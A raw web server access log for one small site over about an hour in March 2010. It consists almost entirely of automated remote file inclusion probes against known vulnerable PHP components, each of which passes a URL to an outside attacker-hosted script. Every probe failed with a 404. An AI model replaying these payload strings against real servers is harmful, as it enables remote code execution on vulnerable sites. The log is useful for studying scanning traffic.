87.106.132.3 - - [08/Mar/2010:00:35:39 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:35:52 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:35:52 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:35:52 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
66.163.171.207 - - [08/Mar/2010:00:36:27 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:37:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:37:00 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:37:01 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:37:08 -0800] "GET /skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:37:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
77.120.104.120 - - [08/Mar/2010:00:37:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:37:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:37:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:37:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:37:47 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:37:47 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:37:47 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:38:54 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:38:55 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:38:55 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:39:21 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:39:31 -0800] "GET /logs///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:39:31 -0800] "GET /logs/access.log///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:39:31 -0800] "GET //good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:39:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:39:32 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
74.50.50.79 - - [08/Mar/2010:00:40:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
74.50.50.79 - - [08/Mar/2010:00:40:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.61 [en] (OS/2; U)" "redneckmba.com"
91.212.140.54 - - [08/Mar/2010:00:40:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "redneckmba.com"
91.212.140.54 - - [08/Mar/2010:00:40:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "redneckmba.com"
72.3.225.148 - - [08/Mar/2010:00:40:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "redneckmba.com"
72.3.225.148 - - [08/Mar/2010:00:40:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "redneckmba.com"
85.238.8.107 - - [08/Mar/2010:00:41:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
85.238.8.107 - - [08/Mar/2010:00:41:15 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:41:25 -0800] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:41:25 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.63.82.14 - - [08/Mar/2010:00:41:25 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:41:32 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:41:32 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:41:32 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
209.20.83.132 - - [08/Mar/2010:00:42:12 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
209.20.83.132 - - [08/Mar/2010:00:42:12 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:43:14 -0800] "GET /logs/access.log///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:43:14 -0800] "GET //good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:43:14 -0800] "GET /logs///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
67.19.107.26 - - [08/Mar/2010:00:44:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
67.19.107.26 - - [08/Mar/2010:00:44:03 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
66.216.127.211 - - [08/Mar/2010:00:44:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
66.216.127.211 - - [08/Mar/2010:00:44:05 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
203.115.131.17 - - [08/Mar/2010:00:44:10 -0800] "GET /logs/access.log//download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.115.131.17 - - [08/Mar/2010:00:44:10 -0800] "GET /download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
203.115.131.17 - - [08/Mar/2010:00:44:11 -0800] "GET /logs//download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:44:28 -0800] "GET /logs///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:44:28 -0800] "GET /logs/access.log///good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
201.28.110.99 - - [08/Mar/2010:00:44:28 -0800] "GET //good.php?board_skin_path=http://vegetable-cutter.ru///administrator/components/com_virtuemart/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.41.160.231 - - [08/Mar/2010:00:44:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
190.41.160.231 - - [08/Mar/2010:00:44:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "redneckmba.com"
112.76.72.3 - - [08/Mar/2010:00:45:25 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "redneckmba.com"
112.76.72.3 - - [08/Mar/2010:00:45:25 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "redneckmba.com"
88.84.95.167 - - [08/Mar/2010:00:45:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
88.84.95.167 - - [08/Mar/2010:00:45:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "redneckmba.com"
80.243.168.142 - - [08/Mar/2010:00:45:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "redneckmba.com"
80.243.168.142 - - [08/Mar/2010:00:45:57 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:00:46:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
72.29.80.127 - - [08/Mar/2010:00:46:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:00:47:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
208.77.223.114 - - [08/Mar/2010:00:47:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:47:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:47:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:47:54 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.195 - - [08/Mar/2010:00:48:07 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:49:04 -0800] "GET /logs//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:49:04 -0800] "GET /include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:49:04 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.140.23.24 - - [08/Mar/2010:00:50:00 -0800] "GET /class.mysql.php?path_to_bt_dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
62.140.23.24 - - [08/Mar/2010:00:50:00 -0800] "GET /logs//class.mysql.php?path_to_bt_dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
62.140.23.24 - - [08/Mar/2010:00:50:00 -0800] "GET /logs/access.log%20%20//class.mysql.php?path_to_bt_dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:51:19 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:51:19 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.106.132.3 - - [08/Mar/2010:00:51:19 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:52:54 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:52:54 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:52:54 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
213.165.84.131 - - [08/Mar/2010:00:53:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.165.84.131 - - [08/Mar/2010:00:53:11 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
213.165.84.131 - - [08/Mar/2010:00:53:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:53:31 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:53:31 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
87.224.132.89 - - [08/Mar/2010:00:53:31 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:53:34 -0800] "GET /logs//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:53:35 -0800] "GET /logs/access.log%20%20//include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
58.150.99.144 - - [08/Mar/2010:00:53:35 -0800] "GET /include/write.php?dir=http://www.lumixclub.com/bbs/columbus/eeng/respon1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
79.141.1.200 - - [08/Mar/2010:00:54:59 -0800] "GET /write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:00:54:59 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
79.141.1.200 - - [08/Mar/2010:00:54:59 -0800] "GET /logs/access.log%20%20//write_comment_update.php?board_skin_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
61.213.96.39 - - [08/Mar/2010:00:55:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "redneckmba.com"
61.213.96.39 - - [08/Mar/2010:00:55:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.bedste-alice.dk/cache/tpl_fisubsilversh.posting_body??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:56:28 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:56:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
216.193.197.59 - - [08/Mar/2010:00:56:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.ecocuisine.fr/administrator/copyright.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
62.140.23.24 - - [08/Mar/2010:01:04:38 -0800] "GET /logs/access.log//class.mysql.php?path_to_bt_dir=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
190.152.217.250 - - [08/Mar/2010:01:11:49 -0800] "GET /logs/access.log/index0.php?show=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
190.152.217.250 - - [08/Mar/2010:01:11:49 -0800] "GET /index0.php?show=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
190.152.217.250 - - [08/Mar/2010:01:11:49 -0800] "GET /logs/index0.php?show=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.107 - - [08/Mar/2010:01:14:21 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [08/Mar/2010:01:21:39 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.120.104.120 - - [08/Mar/2010:01:27:13 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://arsip.rembangkab.go.id/modules/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
